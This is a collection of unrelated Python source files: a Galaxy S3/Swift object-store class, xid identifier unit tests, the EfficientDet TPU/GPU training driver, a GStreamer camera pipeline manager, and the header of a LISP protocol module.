        # s3_dir = '%s/' % rel_path
        # self._push_to_os(s3_dir, from_string='')
        # If instructed, create the dataset in cache & in S3
        if not dir_only:
            rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
            # Touch an empty file locally, then mirror it to S3.
            open(os.path.join(self.staging_path, rel_path), 'w').close()
            self._push_to_os(rel_path, from_string='')
def empty(self, obj, **kwargs):
    """Return True if the object exists and contains no data.

    Raises ObjectNotFound when the object does not exist at all.
    """
    if self.exists(obj, **kwargs):
        # An object is empty when its size is zero; the previous
        # `size > 0` test answered the opposite question.
        return bool(self.size(obj, **kwargs) == 0)
    else:
        raise ObjectNotFound('objectstore.empty, object does not exist: %s, kwargs: %s'
                             % (str(obj), str(kwargs)))
def size(self, obj, **kwargs):
    """Return the object's size in bytes, preferring the cached copy.

    Falls back to the S3-reported size when the object is not cached,
    and returns 0 when no size can be determined.
    """
    rel_path = self._construct_path(obj, **kwargs)
    cached = self._in_cache(rel_path)
    if cached:
        try:
            return os.path.getsize(self._get_cache_path(rel_path))
        except OSError as ex:
            log.info("Could not get size of file '%s' in local cache, will try S3. Error: %s", rel_path, ex)
    if not cached and self.exists(obj, **kwargs):
        return self._get_size_in_s3(rel_path)
    log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
    return 0
def delete(self, obj, entire_dir=False, **kwargs):
    """Delete the object (and optionally its whole directory tree) from
    both the local cache and S3. Returns True on success, False otherwise.
    """
    rel_path = self._construct_path(obj, **kwargs)
    extra_dir = kwargs.get('extra_dir', None)
    base_dir = kwargs.get('base_dir', None)
    dir_only = kwargs.get('dir_only', False)
    obj_dir = kwargs.get('obj_dir', False)
    try:
        # Remove temporary data in JOB_WORK directory
        if base_dir and dir_only and obj_dir:
            shutil.rmtree(os.path.abspath(rel_path))
            return True
        # For the case of extra_files, because we don't have a reference to
        # individual files/keys we need to remove the entire directory structure
        # with all the files in it. This is easy for the local file system,
        # but requires iterating through each individual key in S3 and deleting it.
        if entire_dir and extra_dir:
            shutil.rmtree(self._get_cache_path(rel_path))
            # Remove every S3 key under the rel_path prefix.
            results = self.bucket.get_all_keys(prefix=rel_path)
            for key in results:
                log.debug("Deleting key %s", key.name)
                key.delete()
            return True
        else:
            # Delete from cache first
            os.unlink(self._get_cache_path(rel_path))
            # Delete from S3 as well
            if self._key_exists(rel_path):
                key = Key(self.bucket, rel_path)
                log.debug("Deleting key %s", key.name)
                key.delete()
            return True
    except S3ResponseError:
        log.exception("Could not delete key '%s' from S3", rel_path)
    except OSError:
        log.exception('%s delete error', self.get_filename(obj, **kwargs))
    return False
def get_data(self, obj, start=0, count=-1, **kwargs):
    """Read ``count`` bytes of the object starting at offset ``start``.

    The object is pulled into the local cache first if necessary.
    ``count=-1`` reads to the end of the file.
    """
    rel_path = self._construct_path(obj, **kwargs)
    # Check cache first and get file if not there
    if not self._in_cache(rel_path):
        self._pull_into_cache(rel_path)
    # `with` guarantees the handle is closed even if seek/read raises;
    # the previous open/close pair leaked the handle on error.
    with open(self._get_cache_path(rel_path), 'r') as data_file:
        data_file.seek(start)
        return data_file.read(count)
def get_filename(self, obj, **kwargs):
    """Return a local filesystem path for the object, pulling it into the
    cache from S3 if needed. Raises ObjectNotFound when the object cannot
    be located or downloaded.
    """
    base_dir = kwargs.get('base_dir', None)
    dir_only = kwargs.get('dir_only', False)
    obj_dir = kwargs.get('obj_dir', False)
    rel_path = self._construct_path(obj, **kwargs)
    # for JOB_WORK directory
    if base_dir and dir_only and obj_dir:
        return os.path.abspath(rel_path)
    cache_path = self._get_cache_path(rel_path)
    # S3 does not recognize directories as files so cannot check if those exist.
    # So, if checking dir only, ensure given dir exists in cache and return
    # the expected cache path.
    # dir_only = kwargs.get('dir_only', False)
    # if dir_only:
    #     if not os.path.exists(cache_path):
    #         os.makedirs(cache_path)
    #     return cache_path
    # Check if the file exists in the cache first
    if self._in_cache(rel_path):
        return cache_path
    # Check if the file exists in persistent storage and, if it does, pull it into cache
    elif self.exists(obj, **kwargs):
        if dir_only:  # Directories do not get pulled into cache
            return cache_path
        else:
            if self._pull_into_cache(rel_path):
                return cache_path
    # For the case of retrieving a directory only, return the expected path
    # even if it does not exist.
    # if dir_only:
    #     return cache_path
    raise ObjectNotFound('objectstore.get_filename, no cache_path: %s, kwargs: %s'
                         % (str(obj), str(kwargs)))
    # return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
def update_from_file(self, obj, file_name=None, create=False, **kwargs):
    """Replace the object's content from ``file_name`` (or from its cached
    copy when no file is given), copying into the cache and pushing to S3.

    With ``create=True`` the object is created first if missing.
    Raises ObjectNotFound when the object does not exist.
    """
    if create:
        self.create(obj, **kwargs)
    if self.exists(obj, **kwargs):
        rel_path = self._construct_path(obj, **kwargs)
        # Choose whether to use the dataset file itself or an alternate file
        if file_name:
            source_file = os.path.abspath(file_name)
            # Copy into cache
            cache_file = self._get_cache_path(rel_path)
            try:
                if source_file != cache_file:
                    # FIXME? Should this be a `move`?
                    shutil.copy2(source_file, cache_file)
                self._fix_permissions(cache_file)
            except OSError:
                # Best-effort: a failed cache copy is logged, and the push
                # below proceeds with whatever source_file points at.
                log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
        else:
            source_file = self._get_cache_path(rel_path)
        # Update the file on S3
        self._push_to_os(rel_path, source_file)
    else:
        raise ObjectNotFound('objectstore.update_from_file, object does not exist: %s, kwargs: %s'
                             % (str(obj), str(kwargs)))
def get_object_url(self, obj, **kwargs):
    """Return a pre-signed S3 URL for the object (valid for 24 hours),
    or None if the object does not exist or URL generation fails.
    """
    if not self.exists(obj, **kwargs):
        return None
    rel_path = self._construct_path(obj, **kwargs)
    try:
        return Key(self.bucket, rel_path).generate_url(expires_in=86400)  # 24hrs
    except S3ResponseError:
        log.exception("Trouble generating URL for dataset '%s'", rel_path)
    return None
def get_store_usage_percent(self):
    # S3 storage is effectively unbounded, so usage is always reported
    # as 0% of capacity.
    return 0.0
class SwiftObjectStore(S3ObjectStore):
    """
    Object store that stores objects as items in a Swift bucket. A local
    cache exists that is used as an intermediate location for files between
    Galaxy and Swift.

    Inherits all S3ObjectStore behavior; only the connection setup differs,
    using an S3-compatible endpoint with ordinary (path-style) addressing.
    """
    def _configure_connection(self):
        # Swift is reached through boto's generic S3 interface with an
        # explicit host/port and OrdinaryCallingFormat (path-style URLs),
        # since Swift endpoints do not support virtual-host bucket names.
        log.debug("Configuring Swift Connection")
        self.conn = boto.connect_s3(aws_access_key_id=self.access_key,
                                    aws_secret_access_key=self.secret_key,
                                    is_secure=self.is_secure,
                                    host=self.host,
                                    port=self.port,
                                    calling_format=boto.s3.connection.OrdinaryCallingFormat(),
                                    path=self.conn_path)
|
xidpy_test.py | import unittest
from xidpy import Xid
# Known-good decode vectors. Each 12-byte id decomposes (per the vectors
# below) as: bytes 0-3 timestamp, bytes 4-6 machine id, bytes 7-8 pid,
# bytes 9-11 counter.
TestXids = [
    # taken from https://github.com/rs/xid/blob/master/id_test.go
    {
        'xid': Xid([0x4d, 0x88, 0xe1, 0x5b, 0x60, 0xf4, 0x86, 0xe4, 0x28, 0x41, 0x2d, 0xc9]),
        'ts': 1300816219,
        'machine': ''.join(map(chr, [0x60, 0xf4, 0x86])),
        'pid': 0xe428,
        'counter': 4271561
    },
    # All-zero id: every component decodes to zero.
    {
        'xid': Xid([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]),
        'ts': 0,
        'machine': ''.join(map(chr, [0x00, 0x00, 0x00])),
        'pid': 0x0000,
        'counter': 0
    },
    # Zero timestamp with non-zero machine/pid/counter fields.
    {
        'xid': Xid([0x00, 0x00, 0x00, 0x00, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0x00, 0x00, 0x01]),
        'ts': 0,
        'machine': ''.join(map(chr, [0xaa, 0xbb, 0xcc])),
        'pid': 0xddee,
        'counter': 1
    }
]
class TestXid(unittest.TestCase):
    """Unit tests for the Xid identifier implementation, checked against
    the reference vectors in ``TestXids``."""

    def test_no_duplicates(self):
        # 1000 freshly generated ids must all be distinct.
        ids = {Xid().string() for _ in range(0, 1000)}
        self.assertEqual(len(ids), 1000)

    def test_from_string(self):
        original = Xid()
        parsed = Xid.from_string(original.string())
        self.assertEqual(original.value, parsed.value)
        self.assertEqual(original.bytes(), parsed.bytes())
        self.assertEqual(original.string(), parsed.string())

    def test_xid_always_reversible(self):
        # Encoding then decoding must round-trip for arbitrary ids.
        for _ in range(50):
            xid = Xid()
            self.assertEqual(Xid.from_string(xid.string()).value, xid.value)

    def test_timestamp(self):
        for case in TestXids:
            self.assertEqual(case.get('xid').time(), case.get('ts'))

    def test_machine(self):
        for case in TestXids:
            self.assertEqual(case.get('xid').machine(), case.get('machine'))

    def test_pid(self):
        for case in TestXids:
            self.assertEqual(case.get('xid').pid(), case.get('pid'))

    def test_counter(self):
        for case in TestXids:
            self.assertEqual(case.get('xid').counter(), case.get('counter'))

    def test_copy_array_from_golang(self):
        # Byte array from the Go reference implementation must encode to
        # the same base32 string.
        xid = Xid([0x4d, 0x88, 0xe1, 0x5b, 0x60, 0xf4,
                   0x86, 0xe4, 0x28, 0x41, 0x2d, 0xc9])
        self.assertEqual('9m4e2mr0ui3e8a215n4g', xid.string())

    def test_copy_string_from_golang(self):
        xid = Xid.from_string('9m4e2mr0ui3e8a215n4g')
        self.assertEqual(xid.value, [0x4d, 0x88, 0xe1, 0x5b, 0x60, 0xf4,
                                     0x86, 0xe4, 0x28, 0x41, 0x2d, 0xc9])

    def test_thread_safety(self):
        # Generate ids concurrently; any internal-state corruption would
        # surface as an exception in one of the workers.
        import threading

        def worker():
            for _ in range(10):
                threading.current_thread().ident, Xid().string()

        workers = [threading.Thread(target=worker) for _ in range(10)]
        for t in workers:
            t.start()
        for t in workers:
            t.join()
# Allow running this test module directly: `python xidpy_test.py`.
if __name__ == '__main__':
    unittest.main()
|
main.py | # Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The main training script."""
import multiprocessing
import os
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
import dataloader
import det_model_fn
import hparams_config
import utils
# Command-line flags for the EfficientDet training/eval driver.
# Cluster / accelerator selection:
flags.DEFINE_string(
    'tpu',
    default=None,
    help='The Cloud TPU to use for training. This should be either the name '
    'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
    'url.')
flags.DEFINE_string(
    'gcp_project',
    default=None,
    help='Project name for the Cloud TPU-enabled project. If not specified, we '
    'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
    'tpu_zone',
    default=None,
    help='GCE zone where the Cloud TPU is located in. If not specified, we '
    'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string('eval_name', default=None, help='Eval job name')
flags.DEFINE_enum('strategy', None, ['tpu', 'gpus', ''],
                  'Training: gpus for multi-gpu, if None, use TF default.')
flags.DEFINE_bool('use_fake_data', False, 'Use fake input.')
flags.DEFINE_bool(
    'use_xla', False,
    'Use XLA even if strategy is not tpu. If strategy is tpu, always use XLA, '
    'and this flag has no effect.')
# Model / checkpoint locations:
flags.DEFINE_string('model_dir', None, 'Location of model_dir')
flags.DEFINE_string(
    'backbone_ckpt', '', 'Location of the ResNet50 checkpoint to use for model '
    'initialization.')
flags.DEFINE_string('ckpt', None,
                    'Start training from this EfficientDet checkpoint.')
flags.DEFINE_string(
    'hparams', '', 'Comma separated k=v pairs of hyperparameters or a module'
    ' containing attributes to use as hyperparameters.')
# TPU topology / spatial partitioning:
flags.DEFINE_integer(
    'num_cores', default=8, help='Number of TPU cores for training')
flags.DEFINE_bool('use_spatial_partition', False, 'Use spatial partition.')
flags.DEFINE_integer(
    'num_cores_per_replica',
    default=2,
    help='Number of TPU cores per replica when using spatial partition.')
flags.DEFINE_multi_integer(
    'input_partition_dims', [1, 2, 1, 1],
    'A list that describes the partition dims for all the tensors.')
# Batch sizes / schedule:
flags.DEFINE_integer('train_batch_size', 64, 'global training batch size')
flags.DEFINE_integer('eval_batch_size', 1, 'global evaluation batch size')
flags.DEFINE_integer('eval_samples', 5000, 'Number of samples for eval.')
flags.DEFINE_integer('iterations_per_loop', 200,
                     'Number of iterations per TPU training loop')
flags.DEFINE_integer('save_checkpoints_steps', 200,
                     'Number of iterations per checkpoint save')
# Data locations:
flags.DEFINE_string(
    'training_file_pattern', None,
    'Glob for training data files (e.g., COCO train - minival set)')
flags.DEFINE_string('validation_file_pattern', None,
                    'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
flags.DEFINE_string(
    'val_json_file', None,
    'COCO validation JSON containing golden bounding boxes. If None, use the '
    'ground truth from the dataloader. Ignored if testdev_dir is not None.')
# Typo fixed: 'ignorer' -> 'ignore'.
flags.DEFINE_string('testdev_dir', None,
                    'COCO testdev dir. If not None, ignore val_json_file.')
flags.DEFINE_integer('num_examples_per_epoch', 120000,
                     'Number of examples in one epoch')
flags.DEFINE_integer('num_epochs', None, 'Number of epochs for training')
flags.DEFINE_string('mode', 'train',
                    'Mode to run: train or eval (default: train)')
flags.DEFINE_string('model_name', 'efficientdet-d1', 'Model name.')
flags.DEFINE_bool('eval_after_training', False, 'Run one eval after the '
                  'training finishes.')
flags.DEFINE_bool('profile', False, 'Profile training performance.')
flags.DEFINE_integer(
    'tf_random_seed', None, 'Sets the TF graph seed for deterministic execution'
    ' across runs (for debugging).')
# For Eval mode
flags.DEFINE_integer('min_eval_interval', 300,
                     'Minimum seconds between evaluations.')
flags.DEFINE_integer(
    'eval_timeout', None,
    'Maximum seconds between checkpoints before evaluation terminates.')
# for train_and_eval mode
# Typo fixed: 'trainining' -> 'training'.
flags.DEFINE_bool(
    'run_epoch_in_child_process', True,
    'This option helps to rectify CPU memory leak. If True, every epoch is '
    'run in a separate process for train and eval and memory will be cleared.'
    'Drawback: need to kill 2 processes if training needs to be interrupted.')
FLAGS = flags.FLAGS
def main(_):
  """Train and/or evaluate EfficientDet according to FLAGS.mode.

  Modes: 'train' (optionally with one final eval), 'eval' (loop over new
  checkpoints), and 'train_and_eval' (alternate per epoch).
  """
  if FLAGS.strategy == 'tpu':
    tf.disable_eager_execution()
    tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
        FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
    tpu_grpc_url = tpu_cluster_resolver.get_master()
    tf.Session.reset(tpu_grpc_url)
  else:
    # Always enable auto mixed precision graph rewrite
    os.environ['TF_AUTO_MIXED_PRECISION_GRAPH_REWRITE_IGNORE_PERFORMANCE'] = '1'
    tpu_cluster_resolver = None

  # Check data path
  if FLAGS.mode in ('train', 'train_and_eval'):
    if FLAGS.training_file_pattern is None:
      raise RuntimeError('Must specify --training_file_pattern for train.')
  if FLAGS.mode in ('eval', 'train_and_eval'):
    if FLAGS.validation_file_pattern is None:
      raise RuntimeError('Must specify --validation_file_pattern for eval.')

  # Parse and override hparams
  config = hparams_config.get_detection_config(FLAGS.model_name)
  config.override(FLAGS.hparams)
  if FLAGS.num_epochs:  # NOTE: remove this flag after updating all docs.
    config.num_epochs = FLAGS.num_epochs

  # Parse image size in case it is in string format.
  config.image_size = utils.parse_image_size(config.image_size)

  # The following is for spatial partitioning. `features` has one tensor while
  # `labels` has 4 + (`max_level` - `min_level` + 1) * 2 tensors. The input
  # partition is performed on `features` and all partitionable tensors of
  # `labels`, see the partition logic below.
  # In the TPUEstimator context, the meaning of `shard` and `replica` is the
  # same; following the API, here has mixed use of both.
  if FLAGS.use_spatial_partition:
    # Checks input_partition_dims agrees with num_cores_per_replica.
    if FLAGS.num_cores_per_replica != np.prod(FLAGS.input_partition_dims):
      raise RuntimeError('--num_cores_per_replica must be a product of array'
                         'elements in --input_partition_dims.')
    labels_partition_dims = {
        'mean_num_positives': None,
        'source_ids': None,
        'groundtruth_data': None,
        'image_scales': None,
        'image_masks': None,
    }
    # The Input Partition Logic: We partition only the partition-able tensors.
    feat_sizes = utils.get_feat_sizes(
        config.get('image_size'), config.get('max_level'))
    for level in range(config.get('min_level'), config.get('max_level') + 1):

      def _can_partition(spatial_dim):
        # A dimension is partitionable only if it divides evenly by every
        # entry of input_partition_dims.
        partitionable_index = np.where(
            spatial_dim % np.array(FLAGS.input_partition_dims) == 0)
        return len(partitionable_index[0]) == len(FLAGS.input_partition_dims)

      spatial_dim = feat_sizes[level]
      if _can_partition(spatial_dim['height']) and _can_partition(
          spatial_dim['width']):
        labels_partition_dims['box_targets_%d' %
                              level] = FLAGS.input_partition_dims
        labels_partition_dims['cls_targets_%d' %
                              level] = FLAGS.input_partition_dims
      else:
        labels_partition_dims['box_targets_%d' % level] = None
        labels_partition_dims['cls_targets_%d' % level] = None
    num_cores_per_replica = FLAGS.num_cores_per_replica
    input_partition_dims = [FLAGS.input_partition_dims, labels_partition_dims]
    num_shards = FLAGS.num_cores // num_cores_per_replica
  else:
    num_cores_per_replica = None
    input_partition_dims = None
    num_shards = FLAGS.num_cores

  # Collect everything the model_fn needs into a single params dict.
  params = dict(
      config.as_dict(),
      model_name=FLAGS.model_name,
      iterations_per_loop=FLAGS.iterations_per_loop,
      model_dir=FLAGS.model_dir,
      num_shards=num_shards,
      num_examples_per_epoch=FLAGS.num_examples_per_epoch,
      strategy=FLAGS.strategy,
      backbone_ckpt=FLAGS.backbone_ckpt,
      ckpt=FLAGS.ckpt,
      val_json_file=FLAGS.val_json_file,
      testdev_dir=FLAGS.testdev_dir,
      profile=FLAGS.profile,
      mode=FLAGS.mode)
  config_proto = tf.ConfigProto(
      allow_soft_placement=True, log_device_placement=False)
  if FLAGS.strategy != 'tpu':
    if FLAGS.use_xla:
      config_proto.graph_options.optimizer_options.global_jit_level = (
          tf.OptimizerOptions.ON_1)
    config_proto.gpu_options.allow_growth = True

  model_dir = FLAGS.model_dir
  model_fn_instance = det_model_fn.get_model_fn(FLAGS.model_name)
  max_instances_per_image = config.max_instances_per_image
  if FLAGS.eval_samples:
    # Round up so a partial final batch still gets evaluated.
    eval_steps = int((FLAGS.eval_samples + FLAGS.eval_batch_size - 1) //
                     FLAGS.eval_batch_size)
  else:
    eval_steps = None
  total_examples = int(config.num_epochs * FLAGS.num_examples_per_epoch)
  train_steps = total_examples // FLAGS.train_batch_size
  logging.info(params)

  if not tf.io.gfile.exists(model_dir):
    tf.io.gfile.makedirs(model_dir)

  # Persist the effective config next to the checkpoints for reproducibility.
  config_file = os.path.join(model_dir, 'config.yaml')
  if not tf.io.gfile.exists(config_file):
    tf.io.gfile.GFile(config_file, 'w').write(str(config))

  train_input_fn = dataloader.InputReader(
      FLAGS.training_file_pattern,
      is_training=True,
      use_fake_data=FLAGS.use_fake_data,
      max_instances_per_image=max_instances_per_image)
  eval_input_fn = dataloader.InputReader(
      FLAGS.validation_file_pattern,
      is_training=False,
      use_fake_data=FLAGS.use_fake_data,
      max_instances_per_image=max_instances_per_image)

  if FLAGS.strategy == 'tpu':
    tpu_config = tf.estimator.tpu.TPUConfig(
        FLAGS.iterations_per_loop if FLAGS.strategy == 'tpu' else 1,
        num_cores_per_replica=num_cores_per_replica,
        input_partition_dims=input_partition_dims,
        per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
        .PER_HOST_V2)
    run_config = tf.estimator.tpu.RunConfig(
        cluster=tpu_cluster_resolver,
        model_dir=model_dir,
        log_step_count_steps=FLAGS.iterations_per_loop,
        session_config=config_proto,
        tpu_config=tpu_config,
        save_checkpoints_steps=FLAGS.save_checkpoints_steps,
        tf_random_seed=FLAGS.tf_random_seed,
    )
    # TPUEstimator can do both train and eval.
    train_est = tf.estimator.tpu.TPUEstimator(
        model_fn=model_fn_instance,
        train_batch_size=FLAGS.train_batch_size,
        eval_batch_size=FLAGS.eval_batch_size,
        config=run_config,
        params=params)
    eval_est = train_est
  else:
    strategy = None
    if FLAGS.strategy == 'gpus':
      strategy = tf.distribute.MirroredStrategy()
    run_config = tf.estimator.RunConfig(
        model_dir=model_dir,
        train_distribute=strategy,
        log_step_count_steps=FLAGS.iterations_per_loop,
        session_config=config_proto,
        save_checkpoints_steps=FLAGS.save_checkpoints_steps,
        tf_random_seed=FLAGS.tf_random_seed,
    )

    def get_estimator(global_batch_size):
      # Estimator params carry the per-replica batch size.
      params['num_shards'] = getattr(strategy, 'num_replicas_in_sync', 1)
      params['batch_size'] = global_batch_size // params['num_shards']
      return tf.estimator.Estimator(
          model_fn=model_fn_instance, config=run_config, params=params)

    # train and eval need different estimator due to different batch size.
    train_est = get_estimator(FLAGS.train_batch_size)
    eval_est = get_estimator(FLAGS.eval_batch_size)

  # start train/eval flow.
  if FLAGS.mode == 'train':
    train_est.train(input_fn=train_input_fn, max_steps=train_steps)
    if FLAGS.eval_after_training:
      eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)

  elif FLAGS.mode == 'eval':
    # Run evaluation when there's a new checkpoint
    for ckpt in tf.train.checkpoints_iterator(
        FLAGS.model_dir,
        min_interval_secs=FLAGS.min_eval_interval,
        timeout=FLAGS.eval_timeout):

      logging.info('Starting to evaluate.')
      try:
        eval_results = eval_est.evaluate(eval_input_fn, steps=eval_steps)
        # Terminate eval job when final checkpoint is reached.
        try:
          current_step = int(os.path.basename(ckpt).split('-')[1])
        except IndexError:
          logging.info('%s has no global step info: stop!', ckpt)
          break

        utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
        if current_step >= train_steps:
          logging.info('Eval finished step %d/%d', current_step, train_steps)
          break

      except tf.errors.NotFoundError:
        # Checkpoint might be not already deleted by the time eval finished.
        # We simply skip such case.
        logging.info('Checkpoint %s no longer exists, skipping.', ckpt)

  elif FLAGS.mode == 'train_and_eval':
    # Resume from the latest checkpoint (if any) to determine the epoch.
    ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
    try:
      step = int(os.path.basename(ckpt).split('-')[1])
      current_epoch = (
          step * FLAGS.train_batch_size // FLAGS.num_examples_per_epoch)
      logging.info('found ckpt at step %d (epoch %d)', step, current_epoch)
    except (IndexError, TypeError):
      logging.info('Folder %s has no ckpt with valid step.', FLAGS.model_dir)
      current_epoch = 0

    def run_train_and_eval(e):
      # One full epoch of training followed by one evaluation pass.
      print('\n =====> Starting training, epoch: %d.' % e)
      train_est.train(
          input_fn=train_input_fn,
          max_steps=e * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
      print('\n =====> Starting evaluation, epoch: %d.' % e)
      eval_results = eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
      ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
      utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)

    epochs_per_cycle = 1  # higher number has less graph construction overhead.
    for e in range(current_epoch + 1, config.num_epochs + 1, epochs_per_cycle):
      if FLAGS.run_epoch_in_child_process:
        # Run each epoch in a child process so any leaked CPU memory is
        # reclaimed when the process exits.
        p = multiprocessing.Process(target=run_train_and_eval, args=(e,))
        p.start()
        p.join()
        if p.exitcode != 0:
          return p.exitcode
      else:
        run_train_and_eval(e)

  else:
    logging.info('Invalid mode: %s', FLAGS.mode)
# Entry point: absl parses FLAGS and dispatches to main().
if __name__ == '__main__':
  app.run(main)
|
TPUCameraManager.py | from . import gstreamer
import threading
import enum
import numpy as np
# gst-launch-1.0 v4l2src device="/dev/video0" ! video/x-raw,width=640,height=480,framerate=30/1 ! videoconvert ! video/x-raw,format=I420 ! autovideosink
class CameraManager:
    """Tracks every Cam created through it so cameras can be stopped and
    released individually or all at once."""

    def __init__(self):
        # All Cam instances created via newCam().
        self.camClasses = []

    def newCam(self, device):
        """Create a Cam for video device ``device``, register it, return it."""
        newCamClass = Cam(device)
        self.camClasses.append(newCamClass)
        return newCamClass

    def closeAll(self):
        """Stop and deregister every managed camera."""
        # Iterate over a snapshot: the previous version removed items from
        # the list while iterating it, which skipped every other camera.
        for camClass in list(self.camClasses):
            camClass.stopPipeline()
            camClass.removeAllPipelines()
        self.camClasses = []

    def close(self, camClass):
        """Stop and deregister a single camera."""
        camClass.stopPipeline()
        camClass.removeAllPipelines()
        self.camClasses.remove(camClass)

    def __len__(self):
        # Previous definition omitted `self` and referenced the list as a
        # bare name, so len(manager) always raised. Fixed.
        return len(self.camClasses)
class Cam:
    """A single V4L2 camera and the GStreamer pipeline built on top of it.

    The pipeline string starts as a v4l2 source feeding a tee; addPipeline()
    appends encoder/sink branches, and startPipeline() runs the assembled
    pipeline on a background thread.
    """
    def __init__(self,device):
        # Base pipeline: v4l2src for /dev/video<device> plus a tee element.
        self.pipeline = str(GStreamerPipelines.SRC).format(device)
        self.signals = {}  # sink name -> GStreamer signal callbacks
        self.streams = {}  # sink name -> StreamValue holding the latest buffer
    def on_buffer(self, data, streamName):
        # new-sample callback: route the incoming buffer to its stream.
        self.streams[streamName].newData(data)
    def getImage(self):
        # NOTE(review): self.streamType, self.newdata, self.data and self.res
        # are never assigned anywhere in this class — they appear to be set
        # externally. Confirm before relying on this method.
        if self.streamType is GStreamerPipelines.RGB:
            self.newdata = False
            nparr = np.frombuffer(self.data, dtype=np.uint8)
            # Rows = height (res[1]), columns = width (res[0]), 3 channels.
            image = nparr.reshape(self.res[1], self.res[0], 3)
            return(image)
        else:
            print("Can't return image of H264 stream")
            return(None)
    def addPipeline(self,pipeline,res,fps,sinkName):
        """Append a sink branch to the pipeline and return its StreamValue."""
        self.pipeline += " " + str(pipeline).format(res[0],res[1],fps,sinkName)
        self.signals[sinkName] = {'new-sample': gstreamer.new_sample_callback(self.on_buffer,sinkName),'eos' : gstreamer.on_sink_eos}
        self.streams[sinkName] = StreamValue()
        return(self.streams[sinkName])
    def removePipeline(self,sinkName):
        # Drops bookkeeping only; the branch text already appended to
        # self.pipeline is not removed.
        del self.streams[sinkName]
        del self.signals[sinkName]
    def removeAllPipelines(self):
        self.streams.clear()
        self.signals.clear()
    def startPipeline(self):
        # Run the blocking GStreamer loop on a background thread.
        self.thread = threading.Thread(target=gstreamer.run_pipeline,args=(self.pipeline,self.on_buffer,self.signals))
        self.thread.start()
    def stopPipeline(self):
        # Ask GStreamer to quit, then wait for the worker thread to exit.
        gstreamer.quit()
        self.thread.join()
    def __bytes__(self):
        # NOTE(review): relies on self.newdata/self.data being set externally,
        # same as getImage().
        self.newdata = False
        return self.data
    def __bool__(self):
        return self.newdata
class StreamValue():
    """Holds the most recent buffer produced by a stream sink.

    ``bytes(sv)`` returns the latest buffer and clears the fresh-data flag;
    ``bool(sv)`` reports whether unread data is available. Registered
    listeners receive every new buffer through their ``write()`` method.
    """

    def __init__(self):
        self.data = None          # latest raw buffer (None until first newData)
        self.updatedData = False  # True while the buffer is unread
        self.listeners = []       # objects exposing write(bytes)

    def __bytes__(self):
        # Reading the buffer marks it as consumed.
        self.updatedData = False
        return self.data

    def __bool__(self):
        return self.updatedData

    def newData(self, data):
        """Store a new buffer, fan it out to listeners, mark it unread."""
        self.data = data
        for sink in self.listeners:
            sink.write(self.data)
        self.updatedData = True

    def addListener(self, obj):
        self.listeners.append(obj)
class GStreamerPipelines(enum.Enum):
    """Pipeline fragment templates. For the sink branches the format
    placeholders are {0}=width, {1}=height, {2}=fps, {3}=appsink name;
    for SRC, {0} is the /dev/video device number."""
    # Capture source with a tee; every other branch hangs off "t.".
    SRC = "v4l2src device=/dev/video{0} ! tee name=t"
    # H.264 branch: low-latency x264 encode to a byte-stream appsink.
    H264 = "t. ! queue max-size-buffers=1 leaky=downstream ! video/x-raw,format=YUY2,width={0},height={1},framerate={2}/1 ! videoconvert ! x264enc speed-preset=ultrafast tune=zerolatency threads=4 key-int-max=5 bitrate=1000 aud=False bframes=1 ! video/x-h264,profile=baseline ! h264parse ! video/x-h264,stream-format=byte-stream,alignment=nal ! appsink name={3} emit-signals=True max-buffers=1 drop=False sync=False"
    # Raw RGB branch (GPU-scaled via glbox), dropping stale buffers.
    RGB = "t. ! queue ! glfilterbin filter=glbox ! video/x-raw,format=RGB,width={0},height={1},framerate={2}/1 ! appsink name={3} emit-signals=True max-buffers=1 drop=True sync=False"
    # Low-quality JPEG branch.
    MJPEG = "t. ! queue ! video/x-raw,format=YUY2,width={0},height={1},framerate={2}/1 ! jpegenc quality=20 ! appsink name={3} emit-signals=True"
    # NOTE(review): unlike the others this fragment has no "t." tee prefix
    # and renders to autovideosink rather than an appsink — confirm usage.
    YUYV = "video/x-raw,width=640,height=480,framerate=30/1 ! videoconvert ! video/x-raw,format=I420 ! autovideosink"
    def __str__(self):
        """Return the raw pipeline fragment string."""
        return self.value
|
lisp.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
